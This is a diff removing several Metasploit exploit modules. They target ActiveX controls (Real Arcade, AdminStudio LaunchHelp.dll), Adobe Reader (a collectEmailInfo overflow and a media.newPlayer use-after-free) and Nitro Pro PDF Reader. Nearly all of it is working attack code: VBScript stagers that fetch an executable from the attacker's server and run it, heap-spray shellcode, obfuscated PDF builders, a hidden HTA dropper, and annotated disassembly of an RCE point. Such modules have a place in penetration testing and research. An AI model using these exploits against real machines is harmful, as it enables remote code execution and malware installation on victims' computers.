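-<body>
-<object classid='clsid:E6ACF817-0A85-4EBE-9F0A-096C6488CFEA' id='test'></object>
-<script>
-#{js}
-test.StopModule(#{address});
-</script>
-</body>
-</html>
-MYHTML
-
-html = html.gsub(/^ {4}/, '')
-
-print_status("Sending html")
-send_response(cli, html, {'Content-Type'=>'text/html'})
-end
-end
-
-=begin
-
-The pointer is "controlled" here:
-
-.text:10004449 mov eax, [ebp+arg_0] ; arg_0 is user controlled
-.text:1000444C imul eax, 134h ; it looks good
-.text:10004452 lea esi, [eax+edi] ; eax is user controlled
-.text:10004452 ; edi is a heap pointer initialized while activex loading
-.text:10004452 ; (Important note: the default heap isn't being used)
-.text:10004452 ;
-.text:10004452 ; edi:
-.text:10004452 ;
-.text:10004452 ; 0:000> !heap -p -a edi
-.text:10004452 ; address 01fb370c found in
-.text:10004452 ; _HEAP @ 1fb0000
-.text:10004452 ; HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
-.text:10004452 ; 01fb3668 0373 0000 [01] 01fb3670 01b90 - (busy)
-.text:10004452 ; ? ntractivex118!DllUnregisterServer+10d18
-.text:10004452 ;
-.text:10004452 ; Initialization (while activex loading):
-.text:10004452 ; ChildEBP RetAddr Args to Child
-.text:10004452 ; 00138510 02a4e147 00001b84 02a4e8fb 00001b84 ntdll!RtlAllocateHeap+0xeac
-.text:10004452 ; 00138548 02a4939e 00000000 7dc43038 00e057f8 ntractivex118!DllUnregisterServer+0x8823
-.text:10004452 ; 0013855c 7dea5401 02093628 00000000 7dc43038 ntractivex118!DllUnregisterServer+0x3a7a
-.text:10004452 ; 00138598 7deaa7f8 00e057f8 00e06154 80004005 mshtml!COleSite::InstantiateObjectFromCF+0x114
-
-And user to get RCE here:
-
-.text:1000446E mov eax, [esi+24h] ; esi can be user influenced
-.text:10004471 test eax, eax
-.text:10004473 jz short loc_10004477
-.text:10004475 call eax ; RCE!
-
-=end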
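--- a/PATH_NOT_SHOWN_ON_PAGE
+++ /dev/null
@@ -1,108 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Exploit::Remote
-Rank = NormalRanking
-
-include Msf::Exploit::Remote::HttpServer::HTML
-include Msf::Exploit::EXE
-
-def initialize(info = {})
-super(update_info(info,
-'Name' => 'Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution',
-'Description' => %q{
-This module exploits a vulnerability in Real Networks Arcade Game's ActiveX control. The "exec"
-function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands
-on the victim machine.
-},
-'License' => MSF_LICENSE,
-'Author' =>
-[
-'rgod', #Initial discovery, poc
-'sinn3r', #msf
-],
-'References' =>
-[
-[ 'OSVDB', '71559' ],
-[ 'EDB', '17105' ]
-],
-'Payload' =>
-{
-'Space' => 1024,
-'BadChars' => "\x00",
-},
-'Platform' => 'win',
-'Targets' =>
-[
-[ 'Windows Universal', {} ],
-],
-'DisclosureDate' => 'Apr 3 2011',
-'DefaultTarget' => 0))
-end
-
-# Unfortunately if we echo the vbs cmdstager too many times, we tend to have random missing lines in
-# either the payload or the vbs script. To avoid this problem, I ended up writing this custom routine
-# that only uses one echo.
-def build_vbs(url, payload_name, stager_name)
-name_xmlhttp = rand_text_alpha(2)
-name_adodb = rand_text_alpha(2)
-
-tmp = "#{@temp_folder}/#{stager_name}"
-
-vbs = "echo Set #{name_xmlhttp} = CreateObject(\"\"Microsoft.XMLHTTP\"\") "
-vbs << ": #{name_xmlhttp}.open \"\"GET\"\",\"\"http://#{url}\"\",False : #{name_xmlhttp}.send"
-vbs << ": Set #{name_adodb} = CreateObject(\"\"ADODB.Stream\"\") "
-vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
-vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
-vbs << ": #{name_adodb}.SaveToFile \"\"#{@temp_folder}/#{payload_name}.exe\"\",2 "
-vbs << ": CreateObject(\"\"WScript.Shell\"\").Run \"\"#{@temp_folder}/#{payload_name}.exe\"\",0 >> #{tmp}"
-
-return vbs
-end
-
-def exploit
-@payload_name = rand_text_alpha(4)
-@temp_folder = "C:/Windows/Temp"
-super
-end
-
-def on_request_uri(cli, request)
-if request.uri =~ /\.exe/
-print_status("Sending payload EXE")
-return if ((p=regenerate_payload(cli)) == nil)
-data = generate_payload_exe( {:code=>p.encoded} )
-send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
-return
-end
-
-# Payload's URL
-payload_src = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"
-
-# Create the stager (download + execute payload)
-stager_name = rand_text_alpha(6) + ".vbs"
-stager = build_vbs(payload_src, @payload_name, stager_name)
-
-html_obj_name = rand_text_alpha(6)
-
-html = <<-EOS
-<html>
-<object classid='clsid:5818813E-D53D-47A5-ABBB-37E2A07056B5' id='#{html_obj_name}' />
-</object>
-<script language='vbscript'>
-#{html_obj_name}.Exec "cmd","/c #{stager}",1,1,""
-setTimeout "x=1", 3000
-#{html_obj_name}.Exec "cmd","/c start #{@temp_folder}/#{stager_name}",1,1,""
-</script>
-</html>
-EOS
-
-# Remove extra tabs
-html = html.gsub(/^ {4}/, "")
-
-print_status("Sending #{self.name}")
-send_response(cli, html, { 'Content-Type' => 'text/html' })
-end
-end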
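--- a/PATH_NOT_SHOWN_ON_PAGE
+++ /dev/null
@@ -1,163 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Exploit::Remote
-Rank = NormalRanking
-
-include Msf::Exploit::Remote::HttpServer::HTML
-include Msf::Exploit::EXE
-
-def initialize(info = {})
-super(update_info(info,
-'Name' => 'AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution',
-'Description' => %q{
-This module exploits a vulnerability in AdminStudio LaunchHelp.dll ActiveX control. The
-LaunchProcess function found in LaunchHelp.HelpLauncher.1 allows remote attackers to run
-arbitrary commands on the victim machine. This module has been successfully tested with the
-ActiveX installed with AdminStudio 9.5, which also comes with Novell ZENworks Configuration
-Management 10 SP2, on IE 6 and IE 8 over Windows XP SP 3.
-},
-'License' => MSF_LICENSE,
-'Author' =>
-[
-'rgod', # Vulnerability discovery
-'juan vazquez' # Metasploit module
-],
-'References' =>
-[
-[ 'CVE', '2011-2657' ],
-[ 'OSVDB', '76700'],
-[ 'BID', '50274' ],
-[ 'ZDI', '11-318' ],
-[ 'URL', 'http://www.novell.com/support/viewContent.do?externalId=7009570&sliceId=1' ],
-],
-'Payload' =>
-{
-'Space' => 1024,
-'BadChars' => "\x00",
-},
-'DefaultOptions' =>
-{
-'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
-},
-'Platform' => 'win',
-'Targets' =>
-[
-# LaunchHelp.dll 9.5.0.0
-[ 'Windows Universal', {} ],
-],
-'DisclosureDate' => 'Oct 19 2011',
-'DefaultTarget' => 0))
-
-register_options(
-[
-OptString.new('WINDOWSTEMP', [ true, "The Windows temporal folder.", "C:/Windows/Temp" ]),
-OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]),
-])
-end
-
-def on_new_session(client)
-if client.type != "meterpreter"
-print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
-print_error("The vbs stager and exe payload must be removed manually.")
-return
-end
-
-# stdapi must be loaded before we can use fs.file
-client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
-
-begin
-print_warning("Deleting the vbs payload \"#{@stager_name}\" ...")
-client.fs.file.rm("#{@temp_folder}/#{@stager_name}")
-print_good("The vbs stager has been deleted successfully")
-print_status("The exe payload #{@temp_folder}/#{@payload_name}.exe must be removed manually")
-rescue ::Exception => e
-print_error("Problems while the clenaup")
-print_status("The vbs stager #{@temp_folder}/#{@stager_name} must be removed manually")
-print_status("The exe payload #{@temp_folder}/#{@payload_name}.exe must be removed manually")
-print_error("Exception: #{e.inspect}")
-return
-end
-end
-
-# Stager wrote by sinn3r to avoid problems when echoing the vbs cmdstager too many times.
-# See "real_arcade_installerdlg.rb" for more information.
-def build_vbs(url)
-name_xmlhttp = rand_text_alpha(2)
-name_adodb = rand_text_alpha(2)
-
-tmp = "#{@temp_folder}/#{@stager_name}"
-
-vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "
-vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"
-vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "
-vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
-vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
-vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "
-vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"
-return vbs
-end
-
-def exploit
-@payload_name = rand_text_alpha(4)
-@temp_folder = datastore['WINDOWSTEMP']
-@stager_name = rand_text_alpha(6) + ".vbs"
-super
-end
-
-def on_request_uri(cli, request)
-
-agent = request.headers['User-Agent']
-
-# Avoid the attack if the victim doesn't have the same setup we're targeting
-if not agent =~ /MSIE/
-print_error("Browser not supported: #{agent}")
-send_not_found(cli)
-return
-end
-
-if request.uri =~ /\.exe/
-print_status("Sending payload EXE")
-return if ((p=regenerate_payload(cli)) == nil)
-data = generate_payload_exe( {:code=>p.encoded} )
-send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
-return
-end
-
-# Payload's URL
-payload_src = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"
-
-# Create the stager (download + execute payload)
-stager = build_vbs(payload_src)
-
-js = <<-JS
-var actvx = new ActiveXObject('LaunchHelp.HelpLauncher.1');
-actvx.LaunchProcess("cmd.exe", '/c #{stager}');
-actvx.LaunchProcess("cmd.exe", "/c start #{@temp_folder}/#{@stager_name}");
-JS
-
-if datastore['OBFUSCATE']
-js = ::Rex::Exploitation::JSObfu.new(js)
-js.obfuscate(memory_sensitive: true)
-end
-
-html = <<-EOS
-<html>
-<body>
-<script>
-#{js}
-</script>
-</body>
-</html>
-EOS
-
-# Remove extra tabs
-html = html.gsub(/^ {4}/, "")
-
-print_status("Sending #{self.name}")
-send_response(cli, html, { 'Content-Type' => 'text/html' })
-end
-end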
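--- a/PATH_NOT_SHOWN_ON_PAGE
+++ /dev/null
@@ -1,178 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'zlib'
-
-class MetasploitModule < Msf::Exploit::Remote
-Rank = GoodRanking
-
-include Msf::Exploit::FILEFORMAT
-
-def initialize(info = {})
-super(update_info(info,
-'Name' => 'Adobe Collab.collectEmailInfo() Buffer Overflow',
-'Description' => %q{
-This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1.
-By creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo() call,
-an attacker may be able to execute arbitrary code.
-},
-'License' => MSF_LICENSE,
-'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', ],
-'References' =>
-[
-[ 'CVE', '2007-5659' ],
-[ 'OSVDB', '41495' ]
-],
-'DefaultOptions' =>
-{
-'EXITFUNC' => 'process',
-'DisablePayloadHandler' => 'true',
-},
-'Payload' =>
-{
-'Space' => 1024,
-'BadChars' => "\x00",
-},
-'Platform' => 'win',
-'Targets' =>
-[
-[ 'Adobe Reader v8.1.1 (Windows XP SP0-SP3 English)', { 'Ret' => '' } ],
-],
-'DisclosureDate' => 'Feb 8 2008',
-'DefaultTarget' => 0))
-
-register_options(
-[
-OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
-])
-end
-
-def exploit
-# Encode the shellcode.
-shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
-
-# Make some nops
-nops = Rex::Text.to_unescape(make_nops(4))
-
-# Randomize variables
-rand1 = rand_text_alpha(rand(100) + 1)
-rand2 = rand_text_alpha(rand(100) + 1)
-rand3 = rand_text_alpha(rand(100) + 1)
-rand4 = rand_text_alpha(rand(100) + 1)
-rand5 = rand_text_alpha(rand(100) + 1)
-rand6 = rand_text_alpha(rand(100) + 1)
-rand7 = rand_text_alpha(rand(100) + 1)
-rand8 = rand_text_alpha(rand(100) + 1)
-rand9 = rand_text_alpha(rand(100) + 1)
-rand10 = rand_text_alpha(rand(100) + 1)
-rand11 = rand_text_alpha(rand(100) + 1)
-rand12 = rand_text_alpha(rand(100) + 1)
-
-script = %Q|
-var #{rand1} = unescape("#{shellcode}");
-var #{rand2} ="";
-for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
-#{rand4} = #{rand2} + #{rand1};
-#{rand5} = unescape("#{nops}");
-#{rand6} = 20;
-#{rand7} = #{rand6}+#{rand4}.length
-while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
-#{rand8} = #{rand5}.substring(0, #{rand7});
-#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});
-while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};
-#{rand10} = new Array();
-for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};
-var #{rand12} = unescape("%u0c0c%u0c0c");
-while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};
-this.collabStore = Collab.collectEmailInfo({subj: "",msg: #{rand12}});
-|
-
-# Create the pdf
-pdf = make_pdf(script)
-
-print_status("Creating '#{datastore['FILENAME']}' file...")
-
-file_create(pdf)
-end
-
-def random_non_ascii_string(count)
-result = ""
-count.times do
-result << (rand(128) + 128).chr
-end
-result
-end
-
-def io_def(id)
-"%d 0 obj" % id
-end
-
-def io_ref(id)
-"%d 0 R" % id
-end
-
-#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
-def n_obfu(str)
-result = ""
-str.scan(/./u) do |c|
-if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
-result << "#%x" % c.unpack("C*")[0]
-else
-result << c
-end
-end
-result
-end
-
-def ascii_hex_whitespace_encode(str)
-result = ""
-whitespace = ""
-str.each_byte do |b|
-result << whitespace << "%02x" % b
-whitespace = " " * (rand(3) + 1)
-end
-result << ">"
-end
-
-def make_pdf(js)
-
-xref = []
-eol = "\x0d\x0a"
-endobj = "endobj" << eol
-
-# Randomize PDF version?
-pdf = "%PDF-1.5" << eol
-pdf << "%" << random_non_ascii_string(4) << eol
-xref << pdf.length
-pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj
-xref << pdf.length
-pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj
-xref << pdf.length
-pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj
-xref << pdf.length
-pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj
-xref << pdf.length
-pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj
-xref << pdf.length
-compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
-pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
-pdf << "stream" << eol
-pdf << compressed << eol
-pdf << "endstream" << eol
-pdf << endobj
-xrefPosition = pdf.length
-pdf << "xref" << eol
-pdf << "0 %d" % (xref.length + 1) << eol
-pdf << "0000000000 65535 f" << eol
-xref.each do |index|
-pdf << "%010d 00000 n" % index << eol
-end
-pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
-pdf << "startxref" << eol
-pdf << xrefPosition.to_s() << eol
-pdf << "%%EOF" << eol
-
-end
-end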
@ -1,222 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'zlib'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Adobe Doc.media.newPlayer Use After Free Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat
|
||||
Professional versions up to and including 9.2.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'unknown', # Found in the wild
|
||||
# Metasploit version by:
|
||||
'hdm',
|
||||
'pusscat',
|
||||
'jduck'
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2009-4324' ],
|
||||
[ 'BID', '37331' ],
|
||||
[ 'OSVDB', '60980' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# test results (on Windows XP SP3)
|
||||
# reader 6.0.1 - vulnerable / doesn't work
|
||||
# reader 7.0.5 - untested
|
||||
# reader 7.0.8 - untested
|
||||
# reader 7.0.9 - vulnerable / doesn't work
|
||||
# reader 7.1.0 - untested
|
||||
# reader 7.1.1 - untested
|
||||
# reader 8.0.0 - untested
|
||||
# reader 8.1.1 - works
|
||||
# reader 8.1.2 - untested
|
||||
# reader 8.1.3 - untested
|
||||
# reader 8.1.4 - untested
|
||||
# reader 8.1.5 - untested
|
||||
# reader 8.1.6 - untested
|
||||
# reader 9.0.0 - untested
|
||||
# reader 9.1.0 - works
|
||||
# reader 9.2 - works (no debugger, no DEP)
|
||||
[ 'Adobe Reader Windows English (JS Heap Spray)',
|
||||
{
|
||||
'Size' => (0x10000/2),
|
||||
'Ret' => 0x0c0c0c0c,
|
||||
}
|
||||
],
|
||||
[ 'Adobe Reader Windows German (JS Heap Spray)',
|
||||
{
|
||||
'Size' => (0x10000/2),
|
||||
'Ret' => 0x0a0a0a0a,
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Dec 14 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
|
||||
])
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
# Encode the shellcode.
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
# Make some nops
|
||||
nops = Rex::Text.to_unescape([target.ret].pack('V'))
|
||||
|
||||
# Randomize variables
|
||||
#
|
||||
len = 72
|
||||
rand1 = rand_text_alpha(rand(100) + 1)
|
||||
rand2 = rand_text_alpha(rand(100) + 1)
|
||||
rand3 = rand_text_alpha(rand(100) + 1)
|
||||
rand4 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
|
||||
rand5 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
|
||||
|
||||
vtbuf = [target.ret].pack('V') * 4
|
||||
vtbuf << rand_text_alpha(len - vtbuf.length)
|
||||
vtbuf.gsub!(/([dhHjmMsty])/m, '\\\\' + '\1')
|
||||
retstring = Rex::Text.to_unescape(vtbuf)
|
||||
|
||||
# The printd strings are 72 bytes (??)
|
||||
script = %Q|
|
||||
var #{rand1} = unescape("#{shellcode}");
|
||||
var #{rand2} = unescape("#{nops}");
|
||||
var #{rand3} = unescape("#{retstring}");
|
||||
|
||||
while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
|
||||
#{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);
|
||||
|
||||
memory=new Array();
|
||||
|
||||
for(i=0;i<0x2000;i++) {
|
||||
memory[i]= #{rand2} + #{rand1};
|
||||
}
|
||||
|
||||
util.printd("#{rand4}", new Date());
|
||||
util.printd("#{rand5}", new Date());
|
||||
try {this.media.newPlayer(null);} catch(e) {}
|
||||
util.printd(#{rand3}, new Date());
|
||||
|
|
||||
|
||||
# Create the pdf
|
||||
pdf = make_pdf(script)
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file...")
|
||||
|
||||
file_create(pdf)
|
||||
|
||||
end
|
||||
|
||||
|
||||
def random_non_ascii_string(count)
|
||||
result = ""
|
||||
count.times do
|
||||
result << (rand(128) + 128).chr
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
def io_def(id)
|
||||
"%d 0 obj" % id
|
||||
end
|
||||
|
||||
def io_ref(id)
|
||||
"%d 0 R" % id
|
||||
end
|
||||
|
||||
|
||||
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
|
||||
def n_obfu(str)
|
||||
result = ""
|
||||
str.scan(/./u) do |c|
|
||||
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
|
||||
result << "#%x" % c.unpack("C*")[0]
|
||||
else
|
||||
result << c
|
||||
end
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
|
||||
def ascii_hex_whitespace_encode(str)
|
||||
result = ""
|
||||
whitespace = ""
|
||||
str.each_byte do |b|
|
||||
result << whitespace << "%02x" % b
|
||||
whitespace = " " * (rand(3) + 1)
|
||||
end
|
||||
result << ">"
|
||||
end
|
||||
|
||||
|
||||
def make_pdf(js)
|
||||
|
||||
xref = []
|
||||
eol = "\x0d\x0a"
|
||||
endobj = "endobj" << eol
|
||||
|
||||
pdf = "%PDF-1.5" << eol
|
||||
pdf << "%" << random_non_ascii_string(4) << eol
|
||||
xref << pdf.length
|
||||
pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj
|
||||
xref << pdf.length
|
||||
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
|
||||
pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
|
||||
pdf << "stream" << eol
|
||||
pdf << compressed << eol
|
||||
pdf << "endstream" << eol
|
||||
pdf << endobj
|
||||
xrefPosition = pdf.length
|
||||
pdf << "xref" << eol
|
||||
pdf << "0 %d" % (xref.length + 1) << eol
|
||||
pdf << "0000000000 65535 f" << eol
|
||||
xref.each do |index|
|
||||
pdf << "%010d 00000 n" % index << eol
|
||||
end
|
||||
pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
|
||||
pdf << "startxref" << eol
|
||||
pdf << xrefPosition.to_s() << eol
|
||||
pdf << "%%EOF" << eol
|
||||
|
||||
end
|
||||
end
|
|
@ -1,219 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
|
||||
PDF Reader version 11. The saveAs() Javascript API function allows for writing
|
||||
arbitrary files to the file system. Additionally, the launchURL() function allows
|
||||
an attacker to execute local files on the file system and bypass the security dialog
|
||||
|
||||
Note: This is 100% reliable.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'mr_me <steven[at]srcincite.io>', # vulnerability discovery and exploit
|
||||
'Brendan Coles <bcoles [at] gmail.com>', # hidden hta tricks!
|
||||
'sinn3r' # help with msf foo!
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2017-7442' ],
|
||||
[ 'URL', 'http://srcincite.io/advisories/src-2017-0005/' ], # public advisory #1
|
||||
[ 'URL', 'https://blogs.securiteam.com/index.php/archives/3251' ], # public advisory #2 (verified and acquired by SSD)
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'DisablePayloadHandler' => false
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# truly universal
|
||||
[ 'Automatic', { } ],
|
||||
],
|
||||
'DisclosureDate' => 'Jul 24 2017',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
|
||||
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
|
||||
])
|
||||
deregister_options('SSL', 'SSLVersion', 'SSLCert')
|
||||
end
|
||||
|
||||
def build_vbs(url, stager_name)
|
||||
name_xmlhttp = rand_text_alpha(2)
|
||||
name_adodb = rand_text_alpha(2)
|
||||
vbs = %Q|<head><hta:application
|
||||
applicationname="#{@payload_name}"
|
||||
border="none"
|
||||
borderstyle="normal"
|
||||
caption="false"
|
||||
contextmenu="false"
|
||||
icon="%SystemRoot%/Installer/{7E1360F1-8915-419A-B939-900B26F057F0}/Professional.ico"
|
||||
maximizebutton="false"
|
||||
minimizebutton="false"
|
||||
navigable="false"
|
||||
scroll="false"
|
||||
selection="false"
|
||||
showintaskbar="No"
|
||||
sysmenu="false"
|
||||
version="1.0"
|
||||
windowstate="Minimize"></head>
|
||||
<style>* { visibility: hidden; }</style>
|
||||
<script language="VBScript">
|
||||
window.resizeTo 1,1
|
||||
window.moveTo -2000,-2000
|
||||
</script>
|
||||
<script type="text/javascript">setTimeout("window.close()", 5000);</script>
|
||||
<script language="VBScript">
|
||||
On Error Resume Next
|
||||
Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
|
||||
#{name_xmlhttp}.open "GET","http://#{url}",False
|
||||
#{name_xmlhttp}.send
|
||||
Set #{name_adodb} = CreateObject("ADODB.Stream")
|
||||
#{name_adodb}.Open
|
||||
#{name_adodb}.Type=1
|
||||
#{name_adodb}.Write #{name_xmlhttp}.responseBody
|
||||
#{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2
|
||||
set shellobj = CreateObject("wscript.shell")
|
||||
shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0
|
||||
</script>|
|
||||
vbs.gsub!(/ /,'')
|
||||
return vbs
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
if request.uri =~ /\.exe/
|
||||
print_status("Sending second stage payload")
|
||||
return if ((p=regenerate_payload(cli)) == nil)
|
||||
data = generate_payload_exe( {:code=>p.encoded} )
|
||||
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
# In order to save binary data to the file system the payload is written to a .vbs
|
||||
# file and execute it from there.
|
||||
@payload_name = rand_text_alpha(4)
|
||||
@temp_folder = "/Windows/Temp"
|
||||
register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
|
||||
if datastore['SRVHOST'] == '0.0.0.0'
|
||||
lhost = Rex::Socket.source_address('50.50.50.50')
|
||||
else
|
||||
lhost = datastore['SRVHOST']
|
||||
end
|
||||
payload_src = lhost
|
||||
payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
|
||||
stager_name = rand_text_alpha(6) + ".vbs"
|
||||
pdf = %Q|%PDF-1.7
|
||||
4 0 obj
|
||||
<<
|
||||
/Length 0
|
||||
>>
|
||||
stream
|
||||
|
|
||||
pdf << build_vbs(payload_src, stager_name)
|
||||
pdf << %Q|
|
||||
endstream endobj
|
||||
5 0 obj
|
||||
<<
|
||||
/Type /Page
|
||||
/Parent 2 0 R
|
||||
/Contents 4 0 R
|
||||
>>
|
||||
endobj
|
||||
1 0 obj
|
||||
<<
|
||||
/Type /Catalog
|
||||
/Pages 2 0 R
|
||||
/OpenAction [ 5 0 R /Fit ]
|
||||
/Names <<
|
||||
/JavaScript <<
|
||||
/Names [ (EmbeddedJS)
|
||||
<<
|
||||
/S /JavaScript
|
||||
/JS (
|
||||
